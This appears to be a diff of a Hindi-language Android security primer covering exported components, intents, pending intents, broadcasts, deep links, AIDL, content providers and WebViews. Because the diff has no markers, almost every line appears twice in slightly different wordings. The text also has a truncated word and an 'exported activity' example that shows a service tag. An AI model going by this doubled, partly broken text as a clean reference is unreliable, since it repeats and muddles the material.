एंड्रॉइड घटकों (गतिविधियाँ/सेवाएँ/सामग्री प्रदाता/ब्रॉडकास्ट रिसीवर्स) का एक महत्वपूर्ण पहलू उनकी दृश्यता या **सार्वजनिक स्थिति** है। एक घटक को सार्वजनिक माना जाता है और यह अन्य ऐप्स के साथ इंटरैक्ट कर सकता है यदि इसे **`exported`** के मान के साथ **`true`** के रूप में सेट किया गया है या यदि इसके लिए मैनिफेस्ट में एक Intent Filter घोषित किया गया है। हालाँकि, डेवलपर्स के लिए इन घटकों को स्पष्ट रूप से निजी रखना संभव है, यह सुनिश्चित करते हुए कि वे अनजाने में अन्य ऐप्स के साथ इंटरैक्ट न करें। यह उनके मैनिफेस्ट परिभाषाओं में **`exported`** attribute को **`false`** पर सेट करके प्राप्त किया जाता है।
एंड्रॉइड घटकों (गतिविधियाँ/सेवाएँ/सामग्री प्रदाता/ब्रॉडकास्ट रिसीवर्स) का एक महत्वपूर्ण पहलू उनकी दृश्यता या **सार्वजनिक स्थिति** है। एक घटक को सार्वजनिक माना जाता है और यह अन्य ऐप्स के साथ इंटरैक्ट कर सकता है यदि इसे **`exported`** के मान के साथ **`true`** के रूप में सेट किया गया है या यदि इसके लिए मैनिफेस्ट में एक Intent Filter घोषित किया गया है। हालाँकि, डेवलपर्स के लिए इन घटकों को स्पष्ट रूप से निजी रखना संभव है, यह सुनिश्चित करते हुए कि वे अनजाने में अन्य ऐप्स के साथ इंटरैक्ट न करें। यह उनके मैनिफेस्ट परिभाषाओं में **`exported`** विशेषता को **`false`** पर सेट करके प्राप्त किया जाता है।
इसके अलावा, डेवलपर्स के पास इन घटकों तक पहुंच को और सुरक्षित करने का विकल्प होता है, विशेष अनुमतियों की आवश्यकता करके। **`permission`** attribute को सेट किया जा सकता है ताकि केवल उन ऐप्स को अनुमति दी जा सके जिनके पास निर्दिष्ट अनुमति है, जिससे सुरक्षा और नियंत्रण की एक अतिरिक्त परत जोड़ी जा सके कि कौन इसके साथ इंटरैक्ट कर सकता है।
इसके अलावा, डेवलपर्स के पास इन घटकों तक पहुंच को और सुरक्षित करने का विकल्प होता है, विशेष अनुमतियों की आवश्यकता करके। **`permission`** attribute को सेट किया जा सकता है ताकि केवल उन ऐप्स को अनुमति दी जा सके जिनके पास निर्दिष्ट अनुमति है, ज सुरक्षा और नियंत्रण की एक अतिरिक्त परत जोड़ता है कि कौन इसके साथ इंटरैक्ट कर सकता है।
```java
<activity android:name=".MyActivity" android:exported="false">
<!-- Intent filters go here -->
@ -132,7 +132,7 @@ Intents को एक Intent कंस्ट्रक्टर का उपय
```java
Intent email = new Intent(Intent.ACTION_SEND, Uri.parse("mailto:"));
```
**Action** पहले घोषित किए गए इरादे का **ACTION_SEND** है और **Extra** एक मेलटू **Uri** है (Extra वह अतिरिक्त जानकारी है जिसकी इरादा अपेक्षा कर रहा है)।
**Action** पहले घोषित किए गए इरादे का **ACTION_SEND** है और **Extra** एक मेलटू **Uri** है (Extra वह अतिरिक्त जानकारी है जिसकी अपेक्षा इरादा कर रहा है)।
इस इरादे को मैनिफेस्ट के अंदर निम्नलिखित उदाहरण के रूप में घोषित किया जाना चाहिए:
```xml
@ -145,7 +145,7 @@ Intent email = new Intent(Intent.ACTION_SEND, Uri.parse("mailto:"));
```
एक intent-filter को संदेश प्राप्त करने के लिए **action**, **data** और **category** से मेल खाना चाहिए।
"Intent resolution" प्रक्रिया यह निर्धारित करती है कि प्रत्येक संदेश को कौन सा ऐप प्राप्त करना चाहिए। यह प्रक्रिया **priority attribute** पर विचार करती है, जिसे i**ntent-filter declaration** में सेट किया जा सकता है, और **उच्च प्राथमिकता वाला चयनित होगा**। यह प्राथमिकता -1000 और 1000 के बीच सेट की जा सकती है और एप्लिकेशन `SYSTEM_HIGH_PRIORITY` मान का उपयोग कर सकते हैं। यदि कोई **conflict** उत्पन्न होता है, तो एक "choser" Window प्रकट होती है ताकि **उपयोगकर्ता निर्णय ले सके**
"Intent resolution" प्रक्रिया यह निर्धारित करती है कि प्रत्येक संदेश को कौन सा ऐप प्राप्त करना चाहिए। यह प्रक्रिया **priority attribute** पर विचार करती है, जिसे i**ntent-filter declaration** में सेट किया जा सकता है, और **उच्च प्राथमिकता वाला चयनित होगा**। यह प्राथमिकता -1000 और 1000 के बीच सेट की जा सकती है और एप्लिकेशन `SYSTEM_HIGH_PRIORITY` मान का उपयोग कर सकते हैं। यदि **conflict** उत्पन्न होता है, तो एक "choser" Window प्रकट होती है ताकि **उपयोगकर्ता निर्णय ले सके**
### Explicit Intents
@ -161,18 +161,18 @@ context.startService(intent);
```
### Pending Intents
ये अन्य अनुप्रयोगों को **आपके अनुप्रयोग की ओर से क्रियाएँ करने** की अनुमति देते हैं, आपके ऐप की पहचान और अनुमतियों का उपयोग करते हुए। एक Pending Intent बनाने के लिए **एक इरादा और प्रदर्शन करने के लिए क्रिया को निर्दिष्ट किया जाना चाहिए**। यदि **घोषित इरादा स्पष्ट नहीं है** (यह नहीं बताता कि कौन सा इरादा इसे कॉल कर सकता है) तो एक **दुष्ट अनुप्रयोग घोषित क्रिया को पीड़ित ऐप की ओर से प्रदर्शन कर सकता है**। इसके अलावा, **यदि कोई क्रिया निर्दिष्ट नहीं की गई है**, तो दुष्ट ऐप **पीड़ित की ओर से कोई भी क्रिया कर सकेगा**
ये अन्य अनुप्रयोगों को **आपके अनुप्रयोग की ओर से क्रियाएँ करने** की अनुमति देते हैं, आपके ऐप की पहचान और अनुमतियों का उपयोग करते हुए। एक Pending Intent बनाने के लिए **एक इरादा और प्रदर्शन करने के लिए क्रिया को निर्दिष्ट किया जाना चाहिए**। यदि **घोषित इरादा स्पष्ट नहीं है** (यह नहीं बताता कि कौन सा इरादा इसे कॉल कर सकता है) तो **एक दुर्भावनापूर्ण अनुप्रयोग घोषित क्रिया को पीड़ित ऐप की ओर से कर सकता है**। इसके अलावा, **यदि कोई क्रिया निर्दिष्ट नहीं की गई है**, तो दुर्भावनापूर्ण ऐप **पीड़ित की ओर से कोई भी क्रिया कर सकेगा**
### Broadcast Intents
पिछले इरादों के विपरीत, जो केवल एक ऐप द्वारा प्राप्त होते हैं, ब्रॉडकास्ट इरादे **कई ऐप द्वारा प्राप्त किए जा सकते हैं**। हालाँकि, API संस्करण 14 से, यह **संदेश प्राप्त करने वाले ऐप को निर्दिष्ट करना संभव है** Intent.set Package का उपयोग करके।
पिछले इरादों के विपरीत, जो केवल एक ऐप द्वारा प्राप्त होते हैं, ब्रॉडकास्ट इरादे **कई ऐप द्वारा प्राप्त किए जा सकते हैं**। हालाँकि, API संस्करण 14 से, यह **संदेश प्राप्त करने वाले ऐप को निर्दिष्ट करना संभव है** Intent.setPackage का उपयोग करके।
वैकल्पिक रूप से, ब्रॉडकास्ट भेजते समय **एक अनुमति निर्दिष्ट करना भी संभव है**। रिसीवर ऐप को उस अनुमति की आवश्यकता होगी।
ब्रॉडकास्ट के **दो प्रकार** हैं: **सामान्य** (असिंक्रोनस) और **क्रमबद्ध** (सिंक्रोनस)। **क्रम** रिसीवर तत्व के **कॉन्फ़िगर की गई प्राथमिकता** पर आधारित है। **प्रत्येक ऐप ब्रॉडकास्ट को संसाधित, पुनः प्रसारित या छोड़ सकता है।**
आप `Context` क्लास से `sendBroadcast(intent, receiverPermission)` फ़ंक्शन का उपयोग करके **ब्रॉडकास्ट** **भेजना** संभव है।\
आप **`LocalBroadCastManager`** से **`sendBroadcast`** फ़ंक्शन का भी उपयोग कर सकते हैं जो सुनिश्चित करता है कि **संदेश ऐप से कभी बाहर नहीं जाता**। इसका उपयोग करते समय आपको रिसीवर घटक को निर्यात करने की भी आवश्यकता नहीं होगी।
आप **`LocalBroadCastManager`** से **`sendBroadcast`** फ़ंक्शन का भी उपयोग कर सकते हैं जो सुनिश्चित करता है कि **संदेश ऐप से बाहर नहीं जाता**। इसका उपयोग करते समय आपको रिसीवर घटक को निर्यात करने की भी आवश्यकता नहीं होगी।
### Sticky Broadcasts
@ -184,7 +184,7 @@ context.startService(intent);
## Deep links / URL schemes
Android अनुप्रयोगों में, **डीप लिंक** का उपयोग एक क्रिया (Intent) को सीधे एक URL के माध्यम से आरंभ करने के लिए किया जाता है। यह एक गतिविधि के भीतर एक विशिष्ट **URL स्कीम** घोषित करके किया जाता है। जब एक Android डिवाइस **इस स्कीम के साथ एक URL तक पहुँचने की कोशिश करता है**, तो अनुप्रयोग के भीतर निर्दिष्ट गतिविधि लॉन्च होती है।
Android अनुप्रयोगों में, **डीप लिंक** का उपयोग सीधे एक URL के माध्यम से एक क्रिया (Intent) शुरू करने के लिए किया जाता है। यह एक गतिविधि के भीतर एक विशिष्ट **URL स्कीम** घोषित करके किया जाता है। जब एक Android डिवाइस **इस स्कीम के साथ एक URL तक पहुँचने की कोशिश करता है**, तो अनुप्रयोग के भीतर निर्दिष्ट गतिविधि लॉन्च होती है।
स्कीम को **`AndroidManifest.xml`** फ़ाइल में घोषित किया जाना चाहिए:
```xml
@ -198,7 +198,7 @@ Android अनुप्रयोगों में, **डीप लिंक**
</intent-filter>
[...]
```
पिछले उदाहरण से योजना है `examplescheme://` (ध्यान दें कि **`श्रेणी BROWSABLE`** भी है)
पिछले उदाहरण से योजना `examplescheme://` है (ध्यान दें कि **`श्रेणी BROWSABLE`** भी है)
फिर, डेटा फ़ील्ड में, आप **होस्ट** और **पथ** निर्दिष्ट कर सकते हैं:
```xml
@ -217,25 +217,25 @@ android:host="example"
## AIDL - एंड्रॉइड इंटरफेस परिभाषा भाषा
**एंड्रॉइड इंटरफेस परिभाषा भाषा (AIDL)** का उद्देश्य एंड्रॉइड अनुप्रयोगों में **इंटरप्रोसेस संचार** (IPC) के माध्यम से क्लाइंट और सेवा के बीच संचार को सुविधाजनक बनाना है। चूंकि एंड्रॉइड पर किसी अन्य प्रक्रिया की मेमोरी को सीधे एक्सेस करना अनुमति नहीं है, AIDL इस प्रक्रिया को ऑपरेटिंग सिस्टम द्वारा समझे जाने वाले प्रारूप में ऑब्जेक्ट्स को मार्शल करके सरल बनाता है, जिससे विभिन्न प्रक्रियाओं के बीच संचार को आसान बनाया जा सके
**एंड्रॉइड इंटरफेस परिभाषा भाषा (AIDL)** का उद्देश्य एंड्रॉइड अनुप्रयोगों में **इंटरप्रोसेस संचार** (IPC) के माध्यम से क्लाइंट और सेवा के बीच संचार को सुविधाजनक बनाना है। चूंकि एंड्रॉइड पर किसी अन्य प्रक्रिया की मेमोरी को सीधे एक्सेस करना अनुमति नहीं है, AIDL इस प्रक्रिया को ऑब्जेक्ट्स को एक ऐसे प्रारूप में मार्शल करके सरल बनाता है जिसे ऑपरेटिंग सिस्टम समझता है, इस प्रकार विभिन्न प्रक्रियाओं के बीच संचार को आसान बनाता है
### प्रमुख अवधारणाएँ
- **बाउंड सेवाएँ**: ये सेवाएँ IPC के लिए AIDL का उपयोग करती हैं, जिससे गतिविधियाँ या घटक एक सेवा से बंध सकते हैं, अनुरोध कर सकते हैं और प्रतिक्रियाएँ प्राप्त कर सकते हैं। सेवा की कक्षा में `onBind` विधि इंटरैक्शन शुरू करने के लिए महत्वपूर्ण है, इसे कमजोरियों की खोज में सुरक्षा समीक्षा के लिए एक महत्वपूर्ण क्षेत्र के रूप में चिह्नित किया गया है।
- **मैसेंजर**: एक बाउंड सेवा के रूप में कार्य करते हुए, मैसेंजर IPC को `onBind` विधि के माध्यम से डेटा संसाधित करने पर ध्यान केंद्रित करता है। किसी भी असुरक्षित डेटा हैंडलिंग या संवेदनशील कार्यों के निष्पादन के लिए इस विधि की निकटता से जांच करना आवश्यक है।
- **मेसेन्जर**: एक बाउंड सेवा के रूप में कार्य करते हुए, मेसेन्जर IPC को सुविधाजनक बनाता है, जिसका ध्यान `onBind` विधि के माध्यम से डेटा को संसाधित करने पर है। किसी भी असुरक्षित डेटा हैंडलिंग या संवेदनशील कार्यों के निष्पादन के लिए इस विधि की निकटता से जांच करना आवश्यक है।
- **बाइंडर**: हालांकि बाइंडर वर्ग का प्रत्यक्ष उपयोग AIDL के अमूर्तता के कारण कम सामान्य है, यह समझना फायदेमंद है कि बाइंडर विभिन्न प्रक्रियाओं की मेमोरी स्पेस के बीच डेटा ट्रांसफर को सुविधाजनक बनाने वाला एक कर्नेल-स्तरीय ड्राइवर है। आगे की समझ के लिए, एक संसाधन उपलब्ध है [https://www.youtube.com/watch?v=O-UHvFjxwZ8](https://www.youtube.com/watch?v=O-UHvFjxwZ8)।
- **बाइंडर**: हालांकि बाइंडर क्लास का प्रत्यक्ष उपयोग AIDL के अमूर्तता के कारण कम सामान्य है, यह समझना फायदेमंद है कि बाइंडर विभिन्न प्रक्रियाओं की मेमोरी स्पेस के बीच डेटा ट्रांसफर को सुविधाजनक बनाने वाला एक कर्नेल-स्तरीय ड्राइवर है। आगे की समझ के लिए, एक संसाधन उपलब्ध है [https://www.youtube.com/watch?v=O-UHvFjxwZ8](https://www.youtube.com/watch?v=O-UHvFjxwZ8)।
## घटक
इनमें शामिल हैं: **गतिविधियाँ, सेवाएँ, ब्रॉडकास्ट रिसीवर्स और प्रदाता।**
इनमें शामिल हैं: **गतिविधियाँ, सेवाएँ, प्रसारण रिसीवर और प्रदाता।**
### लॉन्चर गतिविधि और अन्य गतिविधियाँ
एंड्रॉइड ऐप्स में, **गतिविधियाँ** स्क्रीन की तरह होती हैं, जो ऐप के उपयोगकर्ता इंटरफ़ेस के विभिन्न भागों को दिखाती हैं। एक ऐप में कई गतिविधियाँ हो सकती हैं, प्रत्येक एक अद्वितीय स्क्रीन प्रस्तुत करती है।
**लॉन्चर गतिविधि** ऐप का मुख्य गेटवे है, जो तब लॉन्च होती है जब आप ऐप के आइकन पर टैप करते हैं। इसे ऐप के मैनिफेस्ट फ़ाइल में विशिष्ट MAIN और LAUNCHER इरादों के साथ परिभाषित किया गया है:
**लॉन्चर गतिविधि** ऐप का मुख्य गेटवे है, जो तब लॉन्च होती है जब आप ऐप के आइकन पर टैप करते हैं। इसे ऐप के मैनिफेस्ट फ़ाइल में विशिष्ट MAIN और LAUNCHER इंटेंट के साथ परिभाषित किया गया है:
```markup
<activity android:name=".LauncherActivity">
<intent-filter>
@ -244,19 +244,19 @@ android:host="example"
</intent-filter>
</activity>
```
सभी ऐप्स को एक लॉन्चर गतिविधि की आवश्यकता नहीं होती, विशेष रूप से वे जो उपयोगकर्ता इंटरफ़ेस के बिना होते हैं, जैसे बैकग्राउंड सेवाए
सभी ऐप्स को एक लॉन्चर गतिविधि की आवश्यकता नहीं होती, विशेष रूप से वे जो उपयोगकर्ता इंटरफ़ेस के बिना होते हैं, जैसे बैकग्राउंड सेवाए
गतिविधियों को अन्य ऐप्स या प्रक्रियाओं के लिए उपलब्ध कराया जा सकता है, उन्हें मैनिफेस्ट में "निर्यातित" के रूप में चिह्नित करके। यह सेटिंग अन्य ऐप्स को इस गतिविधि को प्रारंभ करने की अनुमति देती है:
```markdown
<service android:name=".ExampleExportedService" android:exported="true"/>
```
हालांकि, किसी अन्य ऐप से गतिविधि तक पहुंचना हमेशा एक सुरक्षा जोखिम नहीं होता है। चिंता तब होती है जब संवेदनशील डेटा गलत तरीके से साझा किया जा रहा हो, जो जानकारी के लीक का कारण बन सकता है।
हालांकि, किसी अन्य ऐप से एक गतिविधि तक पहुंचना हमेशा एक सुरक्षा जोखिम नहीं होता है। चिंता तब होती है जब संवेदनशील डेटा को अनुचित रूप से साझा किया जा रहा हो, जो जानकारी के लीक का कारण बन सकता है।
एक गतिविधि का जीवनचक्र **onCreate विधि के साथ शुरू होता है**, UI सेटअप करना और उपयोगकर्ता के साथ बातचीत के लिए गतिविधि को तैयार करना
एक गतिविधि का जीवनचक्र **onCreate विधि के साथ शुरू होता है**, UI सेटअप करते हुए और उपयोगकर्ता के साथ बातचीत के लिए गतिविधि को तैयार करते हुए
### एप्लिकेशन उपवर्ग
Android विकास में, एक ऐप के पास [Application](https://developer.android.com/reference/android/app/Application) वर्ग का **उपवर्ग** बनाने का विकल्प होता है, हालांकि यह अनिवार्य नहीं है। जब ऐसा उपवर्ग परिभाषित किया जाता है, तो यह ऐप के भीतर पहली कक्षा बन जाती है जिसे इंस्टेंट किया जाता है। यदि इस उपवर्ग में **`attachBaseContext`** विधि लागू की गई है, तो इसे **`onCreate`** विधि से पहले निष्पादित किया जाता है। यह सेटअप शेष एप्लिकेशन शुरू होने से पहले प्रारंभिक प्रारंभ की अनुमति देता है।
Android विकास में, एक ऐप के पास [Application](https://developer.android.com/reference/android/app/Application) वर्ग का एक **उपवर्ग** बनाने का विकल्प होता है, हालांकि यह अनिवार्य नहीं है। जब ऐसा उपवर्ग परिभाषित किया जाता है, तो यह ऐप के भीतर पहली कक्षा बन जाती है जिसे इंस्टेंट किया जाता है। यदि इस उपवर्ग में **`attachBaseContext`** विधि लागू की गई है, तो इसे **`onCreate`** विधि से पहले निष्पादित किया जाता है। यह सेटअप शेष एप्लिकेशन शुरू होने से पहले प्रारंभिक प्रारंभ की अनुमति देता है।
```java
public class MyApp extends Application {
@Override
@ -276,9 +276,9 @@ super.onCreate();
[Services](https://developer.android.com/guide/components/services) **पृष्ठभूमि ऑपरेटिव्स** हैं जो बिना उपयोगकर्ता इंटरफ़ेस के कार्यों को निष्पादित करने में सक्षम हैं। ये कार्य तब भी चलते रह सकते हैं जब उपयोगकर्ता विभिन्न अनुप्रयोगों में स्विच करते हैं, जिससे सेवाएँ **दीर्घकालिक संचालन** के लिए महत्वपूर्ण हो जाती हैं।
सेवाएँ बहुपरकारी हैं; इन्हें विभिन्न तरीकों से आरंभ किया जा सकता है, जिसमें **Intents** इन्हें लॉन्च करने का प्राथमिक तरीका है, जो एक अनुप्रयोग के प्रवेश बिंदु के रूप में कार्य करता है। एक बार जब `startService` विधि का उपयोग करके सेवा शुरू की जाती है, तो इसकी `onStart` विधि सक्रिय हो जाती है और तब तक चलती रहती है जब तक कि `stopService` विधि को स्पष्ट रूप से नहीं बुलाया जाता। वैकल्पिक रूप से, यदि किसी सेवा की भूमिका एक सक्रिय क्लाइंट कनेक्शन पर निर्भर करती है, तो क्लाइंट को सेवा से जोड़ने के लिए `bindService` विधि का उपयोग किया जाता है, जो डेटा पास करने के लिए `onBind` विधि को सक्रिय करता है।
सेवाएँ बहुपरकारी हैं; इन्हें विभिन्न तरीकों से आरंभ किया जा सकता है, जिसमें **Intents** इन्हें लॉन्च करने का प्राथमिक तरीका है। एक बार जब `startService` विधि का उपयोग करके सेवा शुरू की जाती है, तो इसकी `onStart` विधि सक्रिय हो जाती है और तब तक चलती रहती है जब तक `stopService` विधि को स्पष्ट रूप से नहीं बुलाया जाता। वैकल्पिक रूप से, यदि किसी सेवा की भूमिका एक सक्रिय क्लाइंट कनेक्शन पर निर्भर करती है, तो क्लाइंट को सेवा से जोड़ने के लिए `bindService` विधि का उपयोग किया जाता है, जो डेटा पास करने के लिए `onBind` विधि को सक्रिय करता है।
सेवाओं का एक दिलचस्प अनुप्रयोग पृष्ठभूमि संगीत प्लेबैक या नेटवर्क डेटा फ़ेचिंग है, जो उपयोगकर्ता के अनुप्रयोग के साथ बातचीत को बाधित किए बिना होता है। इसके अलावा, सेवाओं को **निर्यात** करके एक ही डिवाइस पर अन्य प्रक्रियाओं के लिए उपलब्ध कराया जा सकता है। यह डिफ़ॉल्ट व्यवहार नहीं है और इसके लिए Android Manifest फ़ाइल में स्पष्ट कॉन्फ़िगरेशन की आवश्यकता होती है:
सेवाओं का एक दिलचस्प अनुप्रयोग पृष्ठभूमि संगीत प्लेबैक या नेटवर्क डेटा फ़ेचिंग है जो उपयोगकर्ता के ऐप के साथ इंटरैक्शन को बाधित किए बिना होता है। इसके अलावा, सेवाओं को **निर्यात** करके एक ही डिवाइस पर अन्य प्रक्रियाओं के लिए उपलब्ध कराया जा सकता है। यह डिफ़ॉल्ट व्यवहार नहीं है और इसके लिए Android Manifest फ़ाइल में स्पष्ट कॉन्फ़िगरेशन की आवश्यकता होती है:
```xml
<service android:name=".ExampleExportedService" android:exported="true"/>
```
@ -286,9 +286,9 @@ super.onCreate();
**Broadcast receivers** एक मैसेजिंग सिस्टम में श्रोता के रूप में कार्य करते हैं, जिससे कई एप्लिकेशन सिस्टम से समान संदेशों का उत्तर दे सकते हैं। एक ऐप **दो प्रमुख तरीकों** से **एक रिसीवर को पंजीकृत** कर सकता है: ऐप के **Manifest** के माध्यम से या ऐप के कोड में **`registerReceiver`** API के माध्यम से **डायनामिकली**। Manifest में, ब्रॉडकास्ट को अनुमतियों के साथ फ़िल्टर किया जाता है, जबकि डायनामिकली पंजीकृत रिसीवर पंजीकरण के समय अनुमतियों को भी निर्दिष्ट कर सकते हैं।
**Intent filters** दोनों पंजीकरण विधियों में महत्वपूर्ण हैं, यह निर्धारित करते हैं कि कौन से ब्रॉडकास्ट रिसीवर को ट्रिगर करते हैं। एक बार जब एक मेल खाने वाला ब्रॉडकास्ट भेजा जाता है, तो रिसीवर का **`onReceive`** मेथड सक्रिय होता है, जिससे ऐप को प्रतिक्रिया देने की अनुमति मिलती है, जैसे कि कम बैटरी अलर्ट के जवाब में व्यवहार को समायोजित करना।
**Intent filters** दोनों पंजीकरण विधियों में महत्वपूर्ण होते हैं, यह निर्धारित करते हैं कि कौन से ब्रॉडकास्ट रिसीवर को ट्रिगर करते हैं। एक बार जब एक मेल खाने वाला ब्रॉडकास्ट भेजा जाता है, तो रिसीवर का **`onReceive`** मेथड सक्रिय होता है, जिससे ऐप को प्रतिक्रिया देने की अनुमति मिलती है, जैसे कि कम बैटरी अलर्ट के जवाब में व्यवहार को समायोजित करना।
ब्रॉडकास्ट **असिंक्रोनस** हो सकते हैं, जो सभी रिसीवर्स तक बिना क्रम के पहुँचते हैं, या **सिंक्रोनस**, जहाँ रिसीवर्स सेट प्राथमिकताओं के आधार पर ब्रॉडकास्ट प्राप्त करते हैं। हालाँकि, यह ध्यान रखना महत्वपूर्ण है कि संभावित सुरक्षा जोखिम है, क्योंकि कोई भी ऐप खुद को प्राथमिकता देकर एक ब्रॉडकास्ट को इंटरसेप्ट कर सकता है।
ब्रॉडकास्ट **असिंक्रोनस** हो सकते हैं, जो सभी रिसीवर्स तक बिना क्रम के पहुँचते हैं, या **सिंक्रोनस**, जहाँ रिसीवर्स सेट प्राथमिकताओं के आधार पर ब्रॉडकास्ट प्राप्त करते हैं। हालाँकि, यह ध्यान रखना महत्वपूर्ण है कि किसी भी ऐप को ब्रॉडकास्ट को इंटरसेप्ट करने के लिए खुद को प्राथमिकता देने का जोखिम होता है।
एक रिसीवर की कार्यक्षमता को समझने के लिए, उसकी क्लास के भीतर **`onReceive`** मेथड को देखें। इस मेथड का कोड प्राप्त Intent को संशोधित कर सकता है, जिससे रिसीवर्स द्वारा डेटा सत्यापन की आवश्यकता को उजागर किया जा सकता है, विशेष रूप से **Ordered Broadcasts** में, जो Intent को संशोधित या छोड़ सकते हैं।
@ -296,7 +296,7 @@ super.onCreate();
**Content Providers** ऐप्स के बीच **संरचित डेटा** साझा करने के लिए आवश्यक हैं, डेटा सुरक्षा सुनिश्चित करने के लिए **अनुमतियों** को लागू करने के महत्व पर जोर देते हैं। वे ऐप्स को विभिन्न स्रोतों से डेटा तक पहुँचने की अनुमति देते हैं, जिसमें डेटाबेस, फ़ाइल सिस्टम, या वेब शामिल हैं। विशिष्ट अनुमतियाँ, जैसे **`readPermission`** और **`writePermission`**, पहुँच को नियंत्रित करने के लिए महत्वपूर्ण हैं। इसके अतिरिक्त, ऐप के मैनिफेस्ट में **`grantUriPermission`** सेटिंग्स के माध्यम से अस्थायी पहुँच प्रदान की जा सकती है, जिसमें विस्तृत पहुँच नियंत्रण के लिए `path`, `pathPrefix`, और `pathPattern` जैसे गुणों का उपयोग किया जाता है।
इनपुट सत्यापन कमजोरियों को रोकने के लिए महत्वपूर्ण है, जैसे SQL इंजेक्शन। Content Providers बुनियादी संचालन का समर्थन करते हैं: `insert()`, `update()`, `delete()`, और `query()`, जो एप्लिकेशनों के बीच डेटा हेरफेर और साझा करने की सुविधा प्रदान करते हैं।
इनपुट सत्यापन कमजोरियों, जैसे SQL इंजेक्शन, को रोकने के लिए महत्वपूर्ण है। Content Providers बुनियादी संचालन का समर्थन करते हैं: `insert()`, `update()`, `delete()`, और `query()`, जो एप्लिकेशनों के बीच डेटा हेरफेर और साझा करने की सुविधा प्रदान करते हैं।
**FileProvider**, एक विशेष Content Provider, फ़ाइलों को सुरक्षित रूप से साझा करने पर केंद्रित है। इसे ऐप के मैनिफेस्ट में विशिष्ट गुणों के साथ परिभाषित किया गया है जो फ़ोल्डरों तक पहुँच को नियंत्रित करते हैं, जिसे `android:exported` और `android:resource` द्वारा फ़ोल्डर कॉन्फ़िगरेशन की ओर इंगित किया गया है। संवेदनशील डेटा को अनजाने में उजागर करने से बचने के लिए निर्देशिकाएँ साझा करते समय सावधानी बरतने की सलाह दी जाती है।
@ -323,9 +323,9 @@ For further information check:
## WebViews
WebViews **एंड्रॉइड ऐप्स** के अंदर **मिनी वेब ब्राउज़र्स** की तरह होते हैं, जो सामग्री को या तो वेब से या स्थानीय फ़ाइलों से खींचते हैं। इन्हें सामान्य ब्राउज़रों के समान जोखिमों का सामना करना पड़ता है, फिर भी कुछ विशेष **सेटिंग्स** के माध्यम से इन जोखिमों को **कम करने** के तरीके हैं।
WebViews Android ऐप्स के अंदर **मिनी वेब ब्राउज़रों** की तरह होते हैं, जो सामग्री को वेब या स्थानीय फ़ाइलों से खींचते हैं। इन्हें सामान्य ब्राउज़रों के समान जोखिमों का सामना करना पड़ता है, फिर भी कुछ विशेष **सेटिंग्स** के माध्यम से **इन जोखिमों को कम करने** के तरीके हैं।
एंड्रॉइड दो मुख्य WebView प्रकार प्रदान करता है:
Android दो मुख्य WebView प्रकार प्रदान करता है:
- **WebViewClient** बुनियादी HTML के लिए अच्छा है लेकिन JavaScript अलर्ट फ़ंक्शन का समर्थन नहीं करता, जो XSS हमलों का परीक्षण करने के तरीके को प्रभावित करता है।
- **WebChromeClient** पूर्ण Chrome ब्राउज़र अनुभव की तरह कार्य करता है।
@ -340,21 +340,21 @@ JavaScript "Bridge" Java ऑब्जेक्ट्स को JavaScript के
फ़ाइल पहुंच को नियंत्रित करने के लिए:
- फ़ाइल पहुंच को अक्षम करना (`setAllowFileAccess(false)`) फ़ाइल सिस्टम तक पहुंच को सीमित करता है, कुछ संपत्तियों के लिए अपवाद के साथ, यह सुनिश्चित करता है कि उन्हें केवल गैर-संवेदनशील सामग्री के लिए उपयोग किया जाए
- फ़ाइल पहुंच को अक्षम करना (`setAllowFileAccess(false)`) फ़ाइल सिस्टम तक पहुंच को सीमित करता है, कुछ संपत्तियों के लिए अपवाद के साथ, यह सुनिश्चित करता है कि वे केवल गैर-संवेदनशील सामग्री के लिए उपयोग की जाएं
## Other App Components and Mobile Device Management
### **Digital Signing of Applications**
- **Digital signing** एंड्रॉइड ऐप्स के लिए अनिवार्य है, यह सुनिश्चित करते हुए कि वे **प्रामाणिक रूप से लिखित** हैं। यह प्रक्रिया ऐप पहचान के लिए एक प्रमाणपत्र का उपयोग करती है और इसे स्थापना के समय डिवाइस के पैकेज प्रबंधक द्वारा सत्यापित किया जाना चाहिए। ऐप्स **स्वयं-हस्ताक्षरित या बाहरी CA द्वारा प्रमाणित** हो सकते हैं, जो अनधिकृत पहुंच के खिलाफ सुरक्षा करते हैं और यह सुनिश्चित करते हैं कि ऐप डिवाइस पर डिलीवरी के दौरान बिना छेड़छाड़ के रहे।
- **Digital signing** Android ऐप्स के लिए अनिवार्य है, यह सुनिश्चित करते हुए कि वे **प्रामाणिक रूप से लिखित** हैं। यह प्रक्रिया ऐप पहचान के लिए एक प्रमाणपत्र का उपयोग करती है और इसे इंस्टॉलेशन के समय डिवाइस के पैकेज प्रबंधक द्वारा सत्यापित किया जाना चाहिए। ऐप्स **स्वयं-हस्ताक्षरित या बाहरी CA द्वारा प्रमाणित** हो सकते हैं, जो अनधिकृत पहुंच से सुरक्षा प्रदान करते हैं और यह सुनिश्चित करते हैं कि ऐप डिवाइस पर डिलीवरी के दौरान बिना छेड़छाड़ के रहे।
### **App Verification for Enhanced Security**
- **Android 4.2** से शुरू होकर, **Verify Apps** नामक एक सुविधा उपयोगकर्ताओं को स्थापना से पहले ऐप्स की सुरक्षा की जांच करने की अनुमति देती है। यह **सत्यापन प्रक्रिया** उपयोगकर्ताओं को संभावित रूप से हानिकारक ऐप्स के खिलाफ चेतावनी दे सकती है, या यहां तक कि विशेष रूप से दुर्भावनापूर्ण ऐप्स की स्थापना को रोक सकती है, जिससे उपयोगकर्ता की सुरक्षा बढ़ती है।
- **Android 4.2** से शुरू होकर, **Verify Apps** नामक एक सुविधा उपयोगकर्ताओं को इंस्टॉलेशन से पहले ऐप्स की सुरक्षा की जांच करने की अनुमति देती है। यह **सत्यापन प्रक्रिया** उपयोगकर्ताओं को संभावित रूप से हानिकारक ऐप्स के खिलाफ चेतावनी दे सकती है, या विशेष रूप से दुर्भावनापूर्ण ऐप्स के इंस्टॉलेशन को रोक सकती है, जिससे उपयोगकर्ता की सुरक्षा बढ़ती है।
### **Mobile Device Management (MDM)**
- **MDM समाधान** मोबाइल उपकरणों के लिए **निगरानी और सुरक्षा** प्रदान करते हैं **Device Administration API** के माध्यम से। इन्हें मोबाइल उपकरणों को प्रभावी ढंग से प्रबंधित और सुरक्षित करने के लिए एक एंड्रॉइड ऐप की स्थापना की आवश्यकता होती है। मुख्य कार्यों में **पासवर्ड नीतियों को लागू करना**, **स्टोरेज एन्क्रिप्शन को अनिवार्य करना**, और **दूरस्थ डेटा मिटाने की अनुमति देना** शामिल है, जो मोबाइल उपकरणों पर व्यापक नियंत्रण और सुरक्षा सुनिश्चित करता है।
